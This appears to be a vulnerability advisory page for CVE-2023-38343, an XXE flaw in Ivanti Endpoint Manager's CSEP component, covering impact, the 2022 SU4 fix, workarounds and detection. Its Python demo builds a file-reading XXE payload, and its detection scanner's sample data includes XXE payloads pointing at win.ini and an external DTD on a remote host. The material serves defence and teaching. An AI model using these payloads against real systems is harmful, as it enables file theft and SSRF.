CVE-2023-38343
📋 TL;DR
An XXE (XML external entity) vulnerability in the CSEP component of Ivanti Endpoint Manager lets an attacker who can submit XML to that component read files from the server or make the server issue requests on their behalf (SSRF), because the XML parser resolves external entities. It affects Ivanti Endpoint Manager installations before 2022 SU4.
💻 Affected Systems
- Ivanti Endpoint Manager
⚠️ Risk & Real-World Impact
Worst Case
Disclosure of sensitive files on the EPM core server (credentials, configuration) that an attacker turns into further compromise and lateral movement, or SSRF against internal services the server can reach.
Likely Case
Unauthorized file access to local system files, potentially exposing credentials, configuration data, or other sensitive information.
If Mitigated
Segmentation and access controls limit what a leaked file or an SSRF request can reach, but the vulnerability itself remains until the update is applied.
🎯 Exploit Status
XXE is a well-understood vulnerability class with public proof-of-concept material; exploiting this instance requires delivering attacker-controlled XML to the vulnerable CSEP endpoint.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 2022 SU4 or later
Vendor Advisory: https://www.ivanti.com/releases
Restart Required: Yes
Instructions:
1. Download Ivanti Endpoint Manager 2022 SU4 or later from the Ivanti portal.
2. Back up the current installation.
3. Apply the update following Ivanti's upgrade documentation.
4. Restart all Ivanti Endpoint Manager services.
🔧 Temporary Workarounds
Disable external entity processing
Configure the XML parser so that it never resolves external entities. In JAXP-based Java code this means enabling FEATURE_SECURE_PROCESSING and the disallow-doctype-decl feature (rejecting any DOCTYPE also removes parameter-entity and external-DTD tricks); other parser stacks have equivalent switches for DTD processing and entity resolution. This is a developer-side control: an administrator cannot reconfigure the parser inside Ivanti Endpoint Manager's CSEP component, so for the product itself the fix is the 2022 SU4 update.
Input validation and filtering
Reject XML that contains a DOCTYPE declaration before it reaches the parser, and validate accepted documents against a schema. Filtering on DOCTYPE is more reliable than searching for ENTITY keywords, because an external DTD or a parameter entity can keep the actual entity declaration outside the request body.
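To make the two controls above concrete, here is an added example (not Ivanti's code and not from the original page) showing the vulnerable and the hardened parser configuration side by side in Python's xml.sax, which exposes the same two switches the workaround names: external entity resolution and DOCTYPE acceptance. The temporary file, the placeholder secret and the payload are constructed for the demonstration.

```python
import io
import os
import tempfile
import xml.sax
from xml.sax.handler import (ContentHandler, feature_external_ges,
                             feature_external_pes, property_lexical_handler)


class _TextCollector(ContentHandler):
    """Collects character data the parser hands back; leaked file content lands here."""

    def __init__(self):
        super().__init__()
        self.parts = []

    def characters(self, content):
        self.parts.append(content)


class _RejectDoctype:
    """Lexical handler that aborts the parse at the first DOCTYPE,
    the SAX equivalent of the disallow-doctype-decl feature."""

    def startDTD(self, name, public_id, system_id):
        raise xml.sax.SAXException("DOCTYPE declarations are not accepted")

    # Remaining lexical callbacks expat may invoke: accept silently.
    def endDTD(self):
        pass

    def startCDATA(self):
        pass

    def endCDATA(self):
        pass

    def comment(self, content):
        pass


def xxe_payload(path: str) -> bytes:
    """Classic XXE: declare an external entity pointing at a local file and reference it."""
    return (f'<?xml version="1.0"?>'
            f'<!DOCTYPE data [<!ENTITY xxe SYSTEM "{path}">]>'
            f'<data>&xxe;</data>').encode()


def parse_insecure(xml_bytes: bytes) -> str:
    """Parser that resolves external general entities: the vulnerable configuration."""
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, True)
    collector = _TextCollector()
    parser.setContentHandler(collector)
    parser.parse(io.BytesIO(xml_bytes))
    return "".join(collector.parts)


def parse_hardened(xml_bytes: bytes) -> str:
    """Parser with external general and parameter entities off and DOCTYPE rejected outright."""
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, False)
    parser.setFeature(feature_external_pes, False)
    parser.setProperty(property_lexical_handler, _RejectDoctype())
    collector = _TextCollector()
    parser.setContentHandler(collector)
    parser.parse(io.BytesIO(xml_bytes))
    return "".join(collector.parts)


def demo() -> tuple:
    """Return (text the insecure parser leaked, whether the hardened parser refused the document)."""
    with tempfile.TemporaryDirectory() as tmp:
        secret = os.path.join(tmp, "secret.txt")
        with open(secret, "w", encoding="utf-8") as fh:
            fh.write("api-token-EXAMPLE")  # constructed stand-in for a secret on the server
        leaked = parse_insecure(xxe_payload(secret))
        try:
            parse_hardened(xxe_payload(secret))
            blocked = False
        except xml.sax.SAXException:
            blocked = True
    return leaked, blocked


if __name__ == "__main__":
    leaked_text, was_blocked = demo()
    print("insecure parser returned:", repr(leaked_text))
    print("hardened parser rejected document:", was_blocked)
```

The insecure parser returns the file's contents as ordinary character data, which is exactly how a product leaks files through an XML endpoint. The hardened parser fails closed on the DOCTYPE before any entity is even declared; turning off the two entity features as well means a DOCTYPE that slips past a later code change still cannot reach the filesystem or the network.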
🧯 If You Can't Patch
- Implement network segmentation to isolate Ivanti Endpoint Manager from sensitive systems
- Deploy a WAF in front of the EPM web endpoints with XXE rules (at minimum, drop XML bodies that contain a DOCTYPE declaration) and monitor for XML-based attacks
🔍 How to Verify
Check if Vulnerable:
Read the installed version from the Ivanti Endpoint Manager console or the installation properties. Any version before 2022 SU4 is vulnerable.
Check Version:
Compare the reported version against 2022 SU4; the Service Update level matters, not just the 2022 release.
Verify Fix Applied:
Confirm the version reads 2022 SU4 or later. If you also want a behavioural check, submit a DOCTYPE-carrying XML document to the CSEP endpoint only in an isolated lab copy, with the entity pointing at a host you control, so that a successful resolution shows up as an inbound request on that host rather than as a file read on a production server.
📡 Detection & Monitoring
Log Indicators:
- XML parse errors or exceptions from the CSEP component, especially ones mentioning DOCTYPE, ENTITY or an unresolved system identifier
- Reads of sensitive files (configuration, credential stores) by the Ivanti process at the moment an XML request was being handled
- Attempts to resolve external entities, including fetches of remote DTDs
Network Indicators:
- HTTP requests to the EPM server whose XML body carries a DOCTYPE with SYSTEM or PUBLIC identifiers
- Outbound connections from the EPM core server to hosts it does not normally talk to (the tell-tale of SSRF or out-of-band XXE exfiltration)
SIEM Query (Splunk-style; deliberately broad, so expect noise and tune it to your field names):
source="ivanti*" AND (xml OR xxe OR doctype OR entity) AND (error OR exception OR access)
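As an added example (not part of the original page or of the product), a body-level check that complements the keyword query above: it flags the DOCTYPE, parameter-entity and SYSTEM/PUBLIC identifier markers of an XXE attempt in captured request bodies and classifies where each external reference would point. The captures and addresses are constructed sample data; in practice the input would come from a reverse proxy or WAF that logs request bodies.

```python
import re

# Markers of an XXE attempt in an XML request body.
DOCTYPE_RE = re.compile(r"<!DOCTYPE\b", re.IGNORECASE)
PARAM_ENTITY_RE = re.compile(r"<!ENTITY\s+%", re.IGNORECASE)
# System identifier of any external entity or external DTD reference.
SYSTEM_ID_RE = re.compile(
    r"""(?:SYSTEM|PUBLIC\s+"[^"]*"|PUBLIC\s+'[^']*')\s+["']([^"']+)["']""",
    re.IGNORECASE)
NETWORK_SCHEMES = {"http", "https", "ftp", "ftps", "gopher", "ldap", "jar"}


def classify_system_id(sysid: str) -> str:
    """Label a system identifier by what resolving it would reach."""
    if re.match(r"^[A-Za-z]:[\\/]", sysid):            # Windows drive path
        return "external-entity:file"
    m = re.match(r"^([A-Za-z][A-Za-z0-9+.-]*):", sysid)
    if m is None:                                      # bare path, resolved against the parser's base
        return "external-entity:file"
    scheme = m.group(1).lower()
    if scheme == "file":
        return "external-entity:file"
    if scheme in NETWORK_SCHEMES:                      # SSRF / out-of-band channel
        return f"external-entity:network:{scheme}"
    return f"external-entity:{scheme}"


def xxe_indicators(body: str) -> list:
    """Return the indicator labels found in one request body (empty list if clean)."""
    findings = []
    if DOCTYPE_RE.search(body):
        findings.append("doctype")
    if PARAM_ENTITY_RE.search(body):
        findings.append("parameter-entity")            # %name; used in blind / out-of-band XXE
    for m in SYSTEM_ID_RE.finditer(body):
        findings.append(classify_system_id(m.group(1)))
    return findings


# Constructed sample captures (source address plus body), not real traffic.
SAMPLE_CAPTURES = [
    {"src": "10.0.0.5",
     "body": '<?xml version="1.0"?><report><host>ws01</host></report>'},
    {"src": "203.0.113.7",
     "body": '<?xml version="1.0"?><!DOCTYPE r [<!ENTITY x SYSTEM "file:///C:/Windows/win.ini">]><r>&x;</r>'},
    {"src": "203.0.113.7",
     "body": '<?xml version="1.0"?><!DOCTYPE r [<!ENTITY % p SYSTEM "http://198.51.100.9/evil.dtd"> %p;]><r/>'},
    {"src": "10.0.0.8",
     "body": '<?xml version="1.0"?><!DOCTYPE r [<!ENTITY greeting "hello">]><r>&greeting;</r>'},
]


def scan_captures(captures) -> list:
    """Return (src, findings) for every capture that carries at least one indicator."""
    results = []
    for cap in captures:
        findings = xxe_indicators(cap["body"])
        if findings:
            results.append((cap["src"], findings))
    return results


if __name__ == "__main__":
    for src, findings in scan_captures(SAMPLE_CAPTURES):
        print(f"{src}: {', '.join(findings)}")
```

A DOCTYPE with only internal entities (the last sample) is reported too, because legitimate agent traffic rarely carries one and it is the precondition for every XXE variant; treat it as low severity and the external-entity labels as the ones to alert on. This is a triage filter on text, not an XML parser, so a quoted string following the word SYSTEM inside ordinary element content can produce a false positive.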